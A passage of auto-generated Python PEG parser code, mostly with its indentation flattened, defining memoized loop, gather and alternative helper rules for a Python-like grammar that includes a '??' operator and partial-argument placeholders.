children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_41(self) -> Optional[Any]:
# _loop0_41: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_42(self) -> Optional[Any]:
# _loop0_42: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_43(self) -> Optional[Any]:
# _loop1_43: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_44(self) -> Optional[Any]:
# _loop0_44: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_45(self) -> Optional[Any]:
# _loop1_45: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_46(self) -> Optional[Any]:
# _loop1_46: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_47(self) -> Optional[Any]:
# _loop1_47: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_48(self) -> Optional[Any]:
# _loop0_48: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_49(self) -> Optional[Any]:
# _loop1_49: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_50(self) -> Optional[Any]:
# _loop0_50: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_51(self) -> Optional[Any]:
# _loop1_51: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_52(self) -> Optional[Any]:
# _loop0_52: param_maybe_default
mark = self._mark()
children = []
while (
(param_maybe_default := self.param_maybe_default())
):
children.append(param_maybe_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_53(self) -> Optional[Any]:
# _loop1_53: param_maybe_default
mark = self._mark()
children = []
while (
(param_maybe_default := self.param_maybe_default())
):
children.append(param_maybe_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_55(self) -> Optional[Any]:
# _loop0_55: ',' with_item
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.with_item())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_54(self) -> Optional[Any]:
# _gather_54: with_item _loop0_55
mark = self._mark()
if (
(elem := self.with_item())
is not None
and
(seq := self._loop0_55())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_57(self) -> Optional[Any]:
# _loop0_57: ',' with_item
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.with_item())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_56(self) -> Optional[Any]:
# _gather_56: with_item _loop0_57
mark = self._mark()
if (
(elem := self.with_item())
is not None
and
(seq := self._loop0_57())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_59(self) -> Optional[Any]:
# _loop0_59: ',' with_item
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.with_item())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_58(self) -> Optional[Any]:
# _gather_58: with_item _loop0_59
mark = self._mark()
if (
(elem := self.with_item())
is not None
and
(seq := self._loop0_59())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_61(self) -> Optional[Any]:
# _loop0_61: ',' with_item
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.with_item())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_60(self) -> Optional[Any]:
# _gather_60: with_item _loop0_61
mark = self._mark()
if (
(elem := self.with_item())
is not None
and
(seq := self._loop0_61())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_62(self) -> Optional[Any]:
# _tmp_62: ',' | ')' | ':'
mark = self._mark()
if (
(literal := self.expect(','))
):
return literal
self._reset(mark)
if (
(literal := self.expect(')'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(':'))
):
return literal
self._reset(mark)
return None
@memoize
def _loop1_63(self) -> Optional[Any]:
# _loop1_63: except_block
mark = self._mark()
children = []
while (
(except_block := self.except_block())
):
children.append(except_block)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_64(self) -> Optional[Any]:
# _tmp_64: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(z := self.name())
):
return z . string
self._reset(mark)
return None
@memoize
def _loop1_65(self) -> Optional[Any]:
# _loop1_65: case_block
mark = self._mark()
children = []
while (
(case_block := self.case_block())
):
children.append(case_block)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_67(self) -> Optional[Any]:
# _loop0_67: '|' closed_pattern
mark = self._mark()
children = []
while (
(literal := self.expect('|'))
and
(elem := self.closed_pattern())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_66(self) -> Optional[Any]:
# _gather_66: closed_pattern _loop0_67
mark = self._mark()
if (
(elem := self.closed_pattern())
is not None
and
(seq := self._loop0_67())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_68(self) -> Optional[Any]:
# _tmp_68: '+' | '-'
mark = self._mark()
if (
(literal := self.expect('+'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('-'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_69(self) -> Optional[Any]:
# _tmp_69: '+' | '-'
mark = self._mark()
if (
(literal := self.expect('+'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('-'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_70(self) -> Optional[Any]:
# _tmp_70: '.' | '(' | '='
mark = self._mark()
if (
(literal := self.expect('.'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('('))
):
return literal
self._reset(mark)
if (
(literal := self.expect('='))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_71(self) -> Optional[Any]:
# _tmp_71: '.' | '(' | '='
mark = self._mark()
if (
(literal := self.expect('.'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('('))
):
return literal
self._reset(mark)
if (
(literal := self.expect('='))
):
return literal
self._reset(mark)
return None
@memoize
def _loop0_73(self) -> Optional[Any]:
# _loop0_73: ',' maybe_star_pattern
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.maybe_star_pattern())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_72(self) -> Optional[Any]:
# _gather_72: maybe_star_pattern _loop0_73
mark = self._mark()
if (
(elem := self.maybe_star_pattern())
is not None
and
(seq := self._loop0_73())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_75(self) -> Optional[Any]:
# _loop0_75: ',' key_value_pattern
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.key_value_pattern())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_74(self) -> Optional[Any]:
# _gather_74: key_value_pattern _loop0_75
mark = self._mark()
if (
(elem := self.key_value_pattern())
is not None
and
(seq := self._loop0_75())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_76(self) -> Optional[Any]:
# _tmp_76: literal_expr | attr
mark = self._mark()
if (
(literal_expr := self.literal_expr())
):
return literal_expr
self._reset(mark)
if (
(attr := self.attr())
):
return attr
self._reset(mark)
return None
@memoize
def _loop0_78(self) -> Optional[Any]:
# _loop0_78: ',' pattern
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.pattern())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_77(self) -> Optional[Any]:
# _gather_77: pattern _loop0_78
mark = self._mark()
if (
(elem := self.pattern())
is not None
and
(seq := self._loop0_78())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_80(self) -> Optional[Any]:
# _loop0_80: ',' keyword_pattern
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.keyword_pattern())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_79(self) -> Optional[Any]:
# _gather_79: keyword_pattern _loop0_80
mark = self._mark()
if (
(elem := self.keyword_pattern())
is not None
and
(seq := self._loop0_80())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop1_81(self) -> Optional[Any]:
# _loop1_81: (',' expression)
mark = self._mark()
children = []
while (
(_tmp_202 := self._tmp_202())
):
children.append(_tmp_202)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_82(self) -> Optional[Any]:
# _loop1_82: (',' star_expression)
mark = self._mark()
children = []
while (
(_tmp_203 := self._tmp_203())
):
children.append(_tmp_203)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_84(self) -> Optional[Any]:
# _loop0_84: ',' star_named_expression
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.star_named_expression())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_83(self) -> Optional[Any]:
# _gather_83: star_named_expression _loop0_84
mark = self._mark()
if (
(elem := self.star_named_expression())
is not None
and
(seq := self._loop0_84())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop1_85(self) -> Optional[Any]:
# _loop1_85: ('or' conjunction)
mark = self._mark()
children = []
while (
(_tmp_204 := self._tmp_204())
):
children.append(_tmp_204)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_86(self) -> Optional[Any]:
# _loop1_86: ('??' conjunction)
mark = self._mark()
children = []
while (
(_tmp_205 := self._tmp_205())
):
children.append(_tmp_205)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_87(self) -> Optional[Any]:
# _loop1_87: ('and' inversion)
mark = self._mark()
children = []
while (
(_tmp_206 := self._tmp_206())
):
children.append(_tmp_206)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_88(self) -> Optional[Any]:
# _loop1_88: compare_op_pipe_expression_pair
mark = self._mark()
children = []
while (
(compare_op_pipe_expression_pair := self.compare_op_pipe_expression_pair())
):
children.append(compare_op_pipe_expression_pair)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_90(self) -> Optional[Any]:
# _loop0_90: ',' slice
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.slice())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_89(self) -> Optional[Any]:
# _gather_89: slice _loop0_90
mark = self._mark()
if (
(elem := self.slice())
is not None
and
(seq := self._loop0_90())
is not None
):
return [elem] + seq
self._reset(mark)
return None
    @memoize
    def _tmp_91(self) -> Optional[Any]:
        # _tmp_91: ':' expression?
        mark = self._mark()
        if (
            (literal := self.expect(':'))
            and
            # NOTE: the trailing comma makes a 1-tuple around the walrus,
            # which is always truthy -- this is the generated encoding of
            # an *optional* item, so d may legitimately be None.
            (d := self.expression(),)
        ):
            return d
        self._reset(mark)
        return None
@memoize
def _tmp_92(self) -> Optional[Any]:
# _tmp_92: tuple | group | genexp
mark = self._mark()
if (
(tuple := self.tuple())
):
return tuple
self._reset(mark)
if (
(group := self.group())
):
return group
self._reset(mark)
if (
(genexp := self.genexp())
):
return genexp
self._reset(mark)
return None
@memoize
def _tmp_93(self) -> Optional[Any]:
# _tmp_93: list | listcomp
mark = self._mark()
if (
(list := self.list())
):
return list
self._reset(mark)
if (
(listcomp := self.listcomp())
):
return listcomp
self._reset(mark)
return None
@memoize
def _tmp_94(self) -> Optional[Any]:
# _tmp_94: dict | set | dictcomp | setcomp
mark = self._mark()
if (
(dict := self.dict())
):
return dict
self._reset(mark)
if (
(set := self.set())
):
return set
self._reset(mark)
if (
(dictcomp := self.dictcomp())
):
return dictcomp
self._reset(mark)
if (
(setcomp := self.setcomp())
):
return setcomp
self._reset(mark)
return None
@memoize
def _tmp_95(self) -> Optional[Any]:
# _tmp_95: yield_expr | named_expression
mark = self._mark()
if (
(yield_expr := self.yield_expr())
):
return yield_expr
self._reset(mark)
if (
(named_expression := self.named_expression())
):
return named_expression
self._reset(mark)
return None
@memoize
def _loop0_96(self) -> Optional[Any]:
# _loop0_96: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_97(self) -> Optional[Any]:
# _loop0_97: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_98(self) -> Optional[Any]:
# _loop0_98: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_99(self) -> Optional[Any]:
# _loop1_99: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_100(self) -> Optional[Any]:
# _loop0_100: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_101(self) -> Optional[Any]:
# _loop1_101: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_102(self) -> Optional[Any]:
# _loop1_102: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_103(self) -> Optional[Any]:
# _loop1_103: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_104(self) -> Optional[Any]:
# _loop0_104: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_105(self) -> Optional[Any]:
# _loop1_105: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_106(self) -> Optional[Any]:
# _loop0_106: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_107(self) -> Optional[Any]:
# _loop1_107: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_108(self) -> Optional[Any]:
# _loop0_108: lambda_param_maybe_default
mark = self._mark()
children = []
while (
(lambda_param_maybe_default := self.lambda_param_maybe_default())
):
children.append(lambda_param_maybe_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_109(self) -> Optional[Any]:
# _loop1_109: lambda_param_maybe_default
mark = self._mark()
children = []
while (
(lambda_param_maybe_default := self.lambda_param_maybe_default())
):
children.append(lambda_param_maybe_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_110(self) -> Optional[Any]:
# _loop1_110: STRING
mark = self._mark()
children = []
while (
(string := self.string())
):
children.append(string)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_111(self) -> Optional[Any]:
# _tmp_111: star_named_expression ',' star_named_expressions?
mark = self._mark()
if (
(y := self.star_named_expression())
and
(literal := self.expect(','))
and
(z := self.star_named_expressions(),)
):
return [y] + ( z or [] )
self._reset(mark)
return None
@memoize
def _loop0_113(self) -> Optional[Any]:
# _loop0_113: ',' double_starred_kvpair
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.double_starred_kvpair())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_112(self) -> Optional[Any]:
# _gather_112: double_starred_kvpair _loop0_113
mark = self._mark()
if (
(elem := self.double_starred_kvpair())
is not None
and
(seq := self._loop0_113())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop1_114(self) -> Optional[Any]:
# _loop1_114: for_if_clause
mark = self._mark()
children = []
while (
(for_if_clause := self.for_if_clause())
):
children.append(for_if_clause)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_115(self) -> Optional[Any]:
# _loop0_115: ('if' disjunction)
mark = self._mark()
children = []
while (
(_tmp_207 := self._tmp_207())
):
children.append(_tmp_207)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_116(self) -> Optional[Any]:
# _loop0_116: ('if' disjunction)
mark = self._mark()
children = []
while (
(_tmp_208 := self._tmp_208())
):
children.append(_tmp_208)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_117(self) -> Optional[Any]:
# _tmp_117: assignment_expression | expression !':='
mark = self._mark()
if (
(assignment_expression := self.assignment_expression())
):
return assignment_expression
self._reset(mark)
if (
(expression := self.expression())
and
self.negative_lookahead(self.expect, ':=')
):
return expression
self._reset(mark)
return None
@memoize
def _loop0_119(self) -> Optional[Any]:
# _loop0_119: ',' (starred_expression | (assignment_expression | expression !':=') !'=')
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self._tmp_209())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_118(self) -> Optional[Any]:
# _gather_118: (starred_expression | (assignment_expression | expression !':=') !'=') _loop0_119
mark = self._mark()
if (
(elem := self._tmp_209())
is not None
and
(seq := self._loop0_119())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_120(self) -> Optional[Any]:
# _tmp_120: ',' kwargs
mark = self._mark()
if (
(literal := self.expect(','))
and
(k := self.kwargs())
):
return k
self._reset(mark)
return None
@memoize
def _loop0_122(self) -> Optional[Any]:
# _loop0_122: ',' kwarg_or_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.kwarg_or_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_121(self) -> Optional[Any]:
# _gather_121: kwarg_or_starred _loop0_122
mark = self._mark()
if (
(elem := self.kwarg_or_starred())
is not None
and
(seq := self._loop0_122())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_124(self) -> Optional[Any]:
# _loop0_124: ',' kwarg_or_double_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.kwarg_or_double_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_123(self) -> Optional[Any]:
# _gather_123: kwarg_or_double_starred _loop0_124
mark = self._mark()
if (
(elem := self.kwarg_or_double_starred())
is not None
and
(seq := self._loop0_124())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_126(self) -> Optional[Any]:
# _loop0_126: ',' kwarg_or_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.kwarg_or_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_125(self) -> Optional[Any]:
# _gather_125: kwarg_or_starred _loop0_126
mark = self._mark()
if (
(elem := self.kwarg_or_starred())
is not None
and
(seq := self._loop0_126())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_128(self) -> Optional[Any]:
# _loop0_128: ',' kwarg_or_double_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.kwarg_or_double_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_127(self) -> Optional[Any]:
# _gather_127: kwarg_or_double_starred _loop0_128
mark = self._mark()
if (
(elem := self.kwarg_or_double_starred())
is not None
and
(seq := self._loop0_128())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_130(self) -> Optional[Any]:
# _loop0_130: "," (partial_placeholder | partial_starred_expression | (assignment_expression | expression !':=') !'=')
mark = self._mark()
children = []
while (
(literal := self.expect(","))
and
(elem := self._tmp_210())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_129(self) -> Optional[Any]:
# _gather_129: (partial_placeholder | partial_starred_expression | (assignment_expression | expression !':=') !'=') _loop0_130
mark = self._mark()
if (
(elem := self._tmp_210())
is not None
and
(seq := self._loop0_130())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_131(self) -> Optional[Any]:
# _tmp_131: ',' partial_kwargs
mark = self._mark()
if (
(literal := self.expect(','))
and
(k := self.partial_kwargs())
):
return k
self._reset(mark)
return None
@memoize
def _loop0_133(self) -> Optional[Any]:
# _loop0_133: ',' partial_kwarg_or_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.partial_kwarg_or_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_132(self) -> Optional[Any]:
# _gather_132: partial_kwarg_or_starred _loop0_133
mark = self._mark()
if (
(elem := self.partial_kwarg_or_starred())
is not None
and
(seq := self._loop0_133())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_135(self) -> Optional[Any]:
# _loop0_135: ',' partial_kwarg_or_double_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.partial_kwarg_or_double_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_134(self) -> Optional[Any]:
# _gather_134: partial_kwarg_or_double_starred _loop0_135
mark = self._mark()
if (
(elem := self.partial_kwarg_or_double_starred())
is not None
and
(seq := self._loop0_135())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_137(self) -> Optional[Any]:
# _loop0_137: ',' partial_kwarg_or_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.partial_kwarg_or_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_136(self) -> Optional[Any]:
# _gather_136: partial_kwarg_or_starred _loop0_137
mark = self._mark()
if (
(elem := self.partial_kwarg_or_starred())
is not None
and
(seq := self._loop0_137())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_139(self) -> Optional[Any]:
# _loop0_139: ',' partial_kwarg_or_double_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.partial_kwarg_or_double_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_138(self) -> Optional[Any]:
# _gather_138: partial_kwarg_or_double_starred _loop0_139
mark = self._mark()
if (
(elem := self.partial_kwarg_or_double_starred())
is not None
and
(seq := self._loop0_139())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_140(self) -> Optional[Any]:
# _tmp_140: partial_placeholder | expression
mark = self._mark()
if (
(partial_placeholder := self.partial_placeholder())
):
return partial_placeholder
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def _tmp_141(self) -> Optional[Any]:
# _tmp_141: partial_placeholder | expression
mark = self._mark()
if (
(partial_placeholder := self.partial_placeholder())
):
return partial_placeholder
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def _tmp_142(self) -> Optional[Any]:
# _tmp_142: partial_placeholder | expression
mark = self._mark()
if (
(partial_placeholder := self.partial_placeholder())
):
return partial_placeholder
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def _tmp_143(self) -> Optional[Any]:
# _tmp_143: partial_placeholder | expression
mark = self._mark()
if (
(partial_placeholder := self.partial_placeholder())
):
return partial_placeholder
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def _loop0_144(self) -> Optional[Any]:
# _loop0_144: (',' star_target)
mark = self._mark()
children = []
while (
(_tmp_211 := self._tmp_211())
):
children.append(_tmp_211)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_146(self) -> Optional[Any]:
# _loop0_146: ',' star_target
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.star_target())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_145(self) -> Optional[Any]:
# _gather_145: star_target _loop0_146
mark = self._mark()
if (
(elem := self.star_target())
is not None
and
(seq := self._loop0_146())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop1_147(self) -> Optional[Any]:
# _loop1_147: (',' star_target)
mark = self._mark()
children = []
while (
(_tmp_212 := self._tmp_212())
):
children.append(_tmp_212)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_148(self) -> Optional[Any]:
# _tmp_148: !'*' star_target
mark = self._mark()
if (
self.negative_lookahead(self.expect, '*')
and
(star_target := self.star_target())
):
return star_target
self._reset(mark)
return None
@memoize
def _loop0_150(self) -> Optional[Any]:
# _loop0_150: ',' del_target
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.del_target())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_149(self) -> Optional[Any]:
# _gather_149: del_target _loop0_150
mark = self._mark()
if (
(elem := self.del_target())
is not None
and
(seq := self._loop0_150())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_152(self) -> Optional[Any]:
# _loop0_152: ',' expression
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.expression())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_151(self) -> Optional[Any]:
# _gather_151: expression _loop0_152
mark = self._mark()
if (
(elem := self.expression())
is not None
and
(seq := self._loop0_152())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_154(self) -> Optional[Any]:
# _loop0_154: ',' expression
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.expression())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_153(self) -> Optional[Any]:
# _gather_153: expression _loop0_154
mark = self._mark()
if (
(elem := self.expression())
is not None
and
(seq := self._loop0_154())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_156(self) -> Optional[Any]:
# _loop0_156: ',' expression
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.expression())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_155(self) -> Optional[Any]:
# _gather_155: expression _loop0_156
mark = self._mark()
if (
(elem := self.expression())
is not None
and
(seq := self._loop0_156())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_158(self) -> Optional[Any]:
# _loop0_158: ',' expression
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.expression())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_157(self) -> Optional[Any]:
# _gather_157: expression _loop0_158
mark = self._mark()
if (
(elem := self.expression())
is not None
and
(seq := self._loop0_158())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_159(self) -> Optional[Any]:
# _tmp_159: NEWLINE INDENT
mark = self._mark()
if (
(_newline := self.expect('NEWLINE'))
and
(_indent := self.expect('INDENT'))
):
return [_newline, _indent]
self._reset(mark)
return None
@memoize
def _tmp_160(self) -> Optional[Any]:
# _tmp_160: args | expression for_if_clauses
mark = self._mark()
if (
(args := self.args())
):
return args
self._reset(mark)
if (
(expression := self.expression())
and
(for_if_clauses := self.for_if_clauses())
):
return [expression, for_if_clauses]
self._reset(mark)
return None
@memoize
def _tmp_161(self) -> Optional[Any]:
# _tmp_161: NAME '='
mark = self._mark()
if (
(name := self.name())
and
(literal := self.expect('='))
):
return [name, literal]
self._reset(mark)
return None
@memoize
def _tmp_162(self) -> Optional[Any]:
# _tmp_162: NAME STRING | SOFT_KEYWORD
mark = self._mark()
if (
(name := self.name())
and
(string := self.string())
):
return [name, string]
self._reset(mark)
if (
(soft_keyword := self.soft_keyword())
):
return soft_keyword
self._reset(mark)
return None
@memoize
def _tmp_163(self) -> Optional[Any]:
# _tmp_163: 'else' | ':'
mark = self._mark()
if (
(literal := self.expect('else'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(':'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_164(self) -> Optional[Any]:
# _tmp_164: '=' | ':='
mark = self._mark()
if (
(literal := self.expect('='))
):
return literal
self._reset(mark)
if (
(literal := self.expect(':='))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_165(self) -> Optional[Any]:
# _tmp_165: list | tuple | genexp | 'True' | 'None' | 'False'
mark = self._mark()
if (
(list := self.list())
